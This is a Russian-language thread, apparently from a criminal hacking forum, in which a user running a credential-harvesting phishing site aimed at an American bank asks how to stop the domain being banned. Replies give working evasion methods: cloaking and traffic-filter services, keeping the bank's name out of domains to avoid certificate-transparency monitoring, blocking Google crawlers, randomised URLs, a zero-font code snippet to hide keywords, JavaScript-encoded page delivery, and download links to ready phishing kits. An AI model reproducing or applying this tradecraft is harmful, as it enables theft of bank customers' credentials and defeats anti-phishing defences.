У меня есть созданный фишинг по сбору данных логина и пароля американского банка. Люто банит домен в течении часа после того как загружаю сайт на хостинг.
Подскажите пожалуйста кто сталкивался
Подскажите пожалуйста кто сталкивался
-
XSS.stack #1 – первый литературный журнал от юзеров форума
Помогите обойти блокировку банковского фишинг сайта, банит домены за час
randomizirovat' stranicu, nastroit' kloaku
раз банит так быстро, то код сайта изменить надо или хостинг
путем исключения найдешь
путем исключения найдешь
Так же может быть всё дело в банке, у него может быть свой отдел ИБ который мониторит появление фишинг-траниц данного банка. Ну или они могут просто покупать такую услугу у какой-нибудь компании. Поэтому всё очень сильно зависит от самого банка.
Отпиши в дм, могу помочь найти проблему, взамен тоже пару вопросов задам )
по своему опыту могу сказать так, что даже компании развитыми отделами иб не будут мешать. главное пользуйтесь защитой от сканирования сайтов
Можно подробнее про средства защиты, хотя бы просто названия
I can solve your problem.As soon as your system is caught, we can share information in return.
Я могу решить вашу проблему.Как только ваша система будет поймана, мы сможем обмениваться информацией в ответ.
Я могу решить вашу проблему.Как только ваша система будет поймана, мы сможем обмениваться информацией в ответ.
минимум это cloudfire максимум это клоака
КейратоТДС справиться(придётся самому отлавливать всех этих негодяев?)? или в наше время нужно более дорогое решение
палишься на запросах в коде
I can help you with. Msg me to talk
отвечу сразу. Нужно три вещи:
1) чтобы в имени домена не было слова твоего банка, т.к. спалят через серт-трансперенси-лог
2) нужно чтобы страница отличалась чуть-чуть по цветовой палитре от оригинала - положи на нее css-фильтр какой-нибудь.
3) нужно блокировать краулер гугла. По ip достаточно - он приходит с подсетей гугла.
Тогда твой фиш будет жить.
1) чтобы в имени домена не было слова твоего банка, т.к. спалят через серт-трансперенси-лог
2) нужно чтобы страница отличалась чуть-чуть по цветовой палитре от оригинала - положи на нее css-фильтр какой-нибудь.
3) нужно блокировать краулер гугла. По ip достаточно - он приходит с подсетей гугла.
Тогда твой фиш будет жить.
если он забанит краулеры, то о продвижении в выдаче можно забыть. Или я ошибаюсь?
Изменить код самих страниц (Рандомизация)
Клоака
Грамотная настройка, и будет счастье от Кейтаро
Продвигать в выдачи фиш банка? Это фетишь такой или?
Бизес полиси задолбало. Уже все описания и заголовки и ключи перебираю. искажаю названия итд. Месячные что ли у гугла ?)
Ко всему сказанному хочу добавить что, можешь попробовать уникализировать код страницы + поставить клоаку и посылать ботов на оригинал редиректом, если будешь юзать клаудфлеер он спасет тебя тоже, но тогда о рекламе можно будет забыть в большинстве случаев, но можно замутить следующую интересную связку из 2х доменов (1 редиректит на другой, непосредственный фишинг) и открывается это все дело только по клику с рекламы, никаких директ доступов
Та же история.. ты победил гугл?) Расскажи что сделал
Еще вопрос, обьяву пускает с такой вот плашкой
Может отсюда у меня проблемы начинаются?
Blacktds or Antibot.pw works fine for me
1. Cтарые домены без кейвордов фиша, новым доменам нужно отлежаться.
2. Домен без кейворда фиша.
3. Устанавливать фишинг не прямым линком, а в папку https://qwerty.qyz/e/e/
4. Фильтр трафика на линк.
5. Рандомный линк. Создавать случайный линк и копировать туда фишинг. Доступ к последнему линку только с ИП создателя. Пример https://test.com/e/ >> https://test.com/e/auth_jwioedwe/?ifjeirfjeriofjepfjei
Рабочий пример скачать:
https://www.sendspace.com/file/juy64d
pass: exploit
Фишинг в auth.html, создает уникальный адрес и не пускает ботов.
6. В коде фишинга убрать все линки, все коннекты на другие хосты, использовать zero font метод для скрытия кеев фиша
Заменить все вхождения "Bank", "Credit", "Account", "password"
Пример:
Юзер будет видеть CHASE
7. Фишинг отдавать через жс, с рандомизацией
Рабочий пример скачать:
https://www.mediafire.com/file/cg1h73ewp0d3hjf/how+to+hide+html.zip/file
Html код между тегами <body></body> конвертируем в юникод через https://www.webtoolhub.com/tn561359-html-encrypter.asp
В js/code.js добавить скопированный юникод var htmlcontent= '%68%74%74%70%3a%2f%2f%77%77%77%2e%77%65%62%74%6f%6f%6c%68%75%62%2e%63%6f%6d%2f%74%6e%35%36%31%33%35%39%2d%68%74%6d%6c%2d%65%6e%63%72%79%70%74%65%72%2e%61%73%70%78';
2. Домен без кейворда фиша.
3. Устанавливать фишинг не прямым линком, а в папку https://qwerty.qyz/e/e/
4. Фильтр трафика на линк.
5. Рандомный линк. Создавать случайный линк и копировать туда фишинг. Доступ к последнему линку только с ИП создателя. Пример https://test.com/e/ >> https://test.com/e/auth_jwioedwe/?ifjeirfjeriofjepfjei
Рабочий пример скачать:
https://www.sendspace.com/file/juy64d
pass: exploit
Фишинг в auth.html, создает уникальный адрес и не пускает ботов.
6. В коде фишинга убрать все линки, все коннекты на другие хосты, использовать zero font метод для скрытия кеев фиша
Заменить все вхождения "Bank", "Credit", "Account", "password"
Пример:
Код:
<style> .zm { font-size:0px} </style> <p>C<p class="zm">hello</p>H<p class="zm">hello</p>A<p class="zm">hello</p>S<p class="zm">hello</p>E</p>7. Фишинг отдавать через жс, с рандомизацией
Рабочий пример скачать:
https://www.mediafire.com/file/cg1h73ewp0d3hjf/how+to+hide+html.zip/file
Html код между тегами <body></body> конвертируем в юникод через https://www.webtoolhub.com/tn561359-html-encrypter.asp
В js/code.js добавить скопированный юникод var htmlcontent= '%68%74%74%70%3a%2f%2f%77%77%77%2e%77%65%62%74%6f%6f%6c%68%75%62%2e%63%6f%6d%2f%74%6e%35%36%31%33%35%39%2d%68%74%6d%6c%2d%65%6e%63%72%79%70%74%65%72%2e%61%73%70%78';